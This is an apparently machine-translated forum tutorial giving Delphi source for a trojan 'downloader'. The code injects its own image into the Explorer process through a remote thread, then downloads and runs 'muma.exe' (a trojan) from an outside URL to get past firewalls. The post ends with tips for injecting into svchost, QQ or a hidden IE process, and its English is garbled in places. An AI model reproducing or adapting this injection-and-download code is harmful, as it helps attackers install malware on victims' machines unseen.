The idea of this code comes from the Aphex of foreign ees organizations. Basically all non-DLL download are used in this way. In fact, the use of rotten remote injection method. But the injected object is not a DLL, but a process of itself. Below is the code, because my professional knowledge is not enough, there may be some statements are not too professional. Please make a look at it. If you don't understand, please keep abreast.
Program Injecttheself;
{$IMAGEBASE $13140000}
Uses Windows, Urlmon;
Procedure Download; Download process
Begin
Urldownloadtofile (Nil, ' http://www.mycode.ful.cn/muma.exe ', ' C:\muma.exe ', 0, nil);
WinExec (' C:\muma.exe ', sw_show); Sw_show or Sw_hide
End
Var
Hmodule, Hmodule_news:pointer;
Extent, Size, Threadid:longword;
ProcessHandle, Pid:longword;
Begin
GetWindowThreadProcessId (FindWindow (' Shell_traywnd ', nil), @Pid);
Get the EXP process PID code, Shell_traywnd for the class name, related to need Spy + + to view
ProcessHandle: = OpenProcess (Process_all_access, False, Pid); Open process
Hmodule: = Pointer (GetModuleHandle (nil));
The value obtained here is a pointer-type variable that points to the content including the base address and length of its own image
Extent: = Pimageoptionalheader (Pointer (Integer (hmodule) + Pimagedosheader (hmodule). _lfanew + sizeof (DWORD) + sizeof ( Timagefileheader)). Sizeofimage;
Get the length of the memory image
VirtualFreeEx (ProcessHandle, hmodule, 0, mem_release);
Allocate a sufficient length of memory within the memory range of the EXP process
Hmodule_news: = VirtualAllocEx (ProcessHandle, hmodule, Extent, Mem_commit or Mem_reserve, page_execute_readwrite);
Determining the location of the starting base and memory image base addresses
WriteProcessMemory (ProcessHandle, Hmodule_news, hmodule, Extent, Size);
Once you have identified the above data, start the operation here
CreateRemoteThread (ProcessHandle, nil, 0, @Download, hmodule, 0, ThreadId);
Set up a remote thread so that the injection process is complete
CloseHandle (ProcessHandle);
Close the image
End.
It is necessary to note that although this is already a full-wall version of the downloader code. But it still has a lot of bugs. If you want to write your own downloader, please address the following questions :
1, the above code to use the remote injection method used by the function under Windows9x not.
2. Windows and some applications protect certain processes and do not allow the process to operate over-privileged. such as Svchost, QQ and other processes of injection, must first carry out the right to operate.
3, if you need to inject into ie. Please first use WinExec's sw_hide mode to open a hidden IE process, suspend the program for 3 seconds before injecting. This is for some old machines.
Build a non-DLL version of penetration Firewall downloader